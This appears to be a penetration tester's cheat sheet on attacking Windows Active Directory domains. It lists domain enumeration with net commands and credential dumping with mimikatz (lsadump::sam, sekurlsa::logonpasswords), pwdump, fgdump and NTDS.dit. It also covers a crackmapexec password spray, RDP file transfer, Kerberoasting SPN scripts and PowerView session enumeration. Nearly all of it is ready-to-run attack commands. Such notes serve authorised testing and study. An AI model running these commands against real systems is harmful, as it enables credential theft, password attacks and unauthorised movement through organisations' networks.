Users / Groups / Computers

  • Look for users with high-privs across the domain e.g. Domain Admins or Derivative Local Admins

  • Look for custom groups.

# get all users in the domain # are there any weird domains? 
cmd> net user /domain
cmd> net user [username] /domain

# get all groups in the domain
cmd> net group /domain
cmd> net group [groupname] /domain

# get all computers in domain
cmd> net view
cmd> net view /domain

# get resources/shares of specified computer
cmd> net view \\[computer_name] /domain

If you can't get all the domain members info, you might want to check the priv (whoami /priv)

Check the UAC is enabled (if you're not able to execute executables that you uploaded like mimikatz)


Plaintext? (low hanging fruit) > Passwordspray?

  • WinPeas may reveal plaintext pass.

Dumping creds if it's not launghed from a SYSTEM, we need to run

token::elevate after privilege::debuf

# dump NTLM hashes + plaintext creds
mimikatz > lsadump::sam              # dump contents of SAM db in current host
mimikatz > sekurlsa::logonpasswords  # dump creds of logged-on users

Other tools

cmd> pwdump.exe localhost
cmd> fgdump.exe localhost          # improved pwdump, shutdown firewalls 
cmd> type C:\Windows\NTDS\NTDS.dit # all domain hashes in NTDS.dit file on the Domain Controller

Are there any pattens in users passwords? Can we make a password list and do a password spray?

crackmapexec smb IP -u user.txt -p pass.txt --continue-on-success

Then try RDP

rdesktop -r disk:tmp=/home/kali/transfer -u domain_name\\user_name -p Password IP_+addr
  • by setting a disk argument, we can see and transfer all the files from the directory as a share. It's super useful.


Service Principal Names (AD Service Accounts)

  • A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.

  • Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.

  • Query the Domain Controller in search of SPNs.

  • SPN Examples

    • CIFS/MYCOMPUTER$ - file share access.

    • LDAP/MYCOMPUTER$ - querying AD info via. LDAP.

    • HTTP/MYCOMPUTER$ - Web services such as IIS.


  • Perform nslookup of the service hostname -> see if there is an entrypoint here.

  • Automated SPN enum scripts:

# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
PS> .\GetUserSPNs.ps1

# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
PS> .\Get-SPN.ps1

Logged-in users and active user sessions.

PS> Set-ExecutionPolicy Unrestricted
PS> Import-Module .\PowerView.ps1
PS> Get-NetLoggedon -ComputerName [computer_name]    # enum logged-in users
PS> Get-NetSession -ComputerName [domain_controller] # enum active user sessions

Domain Controller hostname (PdcRoleOwner)**

PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Last updated